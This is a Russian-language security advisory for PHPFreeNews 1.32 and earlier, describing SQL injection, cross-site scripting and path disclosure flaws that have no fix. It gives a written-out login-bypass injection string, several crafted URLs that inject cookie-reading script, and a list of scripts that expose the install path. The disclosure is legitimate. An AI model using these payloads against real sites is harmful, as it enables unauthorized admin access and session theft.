| Дата публикации: | 02.08.2005 |
| Всего просмотров: | 1482 |
| Опасность: | Средняя |
| Наличие исправления: | Нет |
| Количество уязвимостей: | 1 |
| CVE ID: |
CVE-2005-2637 CVE-2005-2638 |
| Вектор эксплуатации: | Удаленная |
| Воздействие: |
Межсайтовый скриптинг Неавторизованное изменение данных |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | PHPFreeNews 1.x |
| Уязвимые версии: PHPFreeNews 1.32 и более ранние версии
Описание: 1. Удаленный пользователь может послать специально сформированный запрос приложению и выполнить произвольные SQL команды в базе данных. Пример:
login: Admin
password: ') or isnull(1/0) or ('a'='a
2. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:
http://[target]/[path]/inc/Footer.php?ScriptVersion= < script>alert(document.cookie)</script> http://[target]/[path]/inc/ScriptFunctions.php? FullNews DisplayMode=3& NewsDir=")}//--></script> <script>alert(document.cookie)</script> http://[target]/[path]/inc/ScriptFunctions.php? EnableRatings=1&NewsDir=" )}//--></script><script> alert(document.cookie)</script> http://[target]/[path]/inc/ScriptFunctions.php? EnableComments=1&NewsDir=" )}//--></script><script> alert(document.cookie)</script> http://[target]/[path]/inc/ScriptFunctions.php? FullNewsDisplayMode=3&PopupWidth=")}//--></script> <script>alert(document.cookie)</script> http://[target]/[path]/inc/Script Functions.php? FullNewsDisplayMode=3&PopupHeight=")}//--></script> <script>alert(document.cookie)</script> http://[target]/[path]/inc/ScriptFunctions.php? EnableComments=1&PopupWidth=")}//--></script><script> alert(document.cookie)</script> http://[target]/[path]/inc/ScriptFunctions.php? EnableComments=1&PopupHeight=")}//--></script> <script>alert(document.cookie)</script>3. Удаленный пользователь может непосредственно обратится к сценарию и получить данные об установочной директории приложения на системе. Уязвимые сценарии: http://[target]/[path]/inc/ArchiveOldNews.php http://[target]/[path]/inc/Categori es.php http://[target]/[path]/inc/CheckLogout.php http://[target]/[path]/inc/CommentsApproval.php http://[target]/[path]/inc/Images.php http://[target]/[path]/inc/New sList.php http://[target]/[path]/inc/Password.php http://[target]/[path]/inc/Post.php http://[target]/[path]/inc/PostsApproval.php http://[target]/[path]/inc/PurgeOld News.php http://[target]/[path]/inc/SetSticky.php http://[target]/[path]/inc/SetVisible.php http://[target]/[path]/inc/Statistics.php http://[target]/[path]/inc/Templ ate.php http://[target]/[path]/inc/UserDefinedCodes.php http://[target]/[path]/inc/Users.php URL производителя: www.phpfreenews.co.uk Решение: Способов устранения уязвимости не существует в настоящее время. |
|
| Ссылки: | PHPFreeNews Input Validation Holes Permit Cross-Site Scripting and SQL Injection Attacks |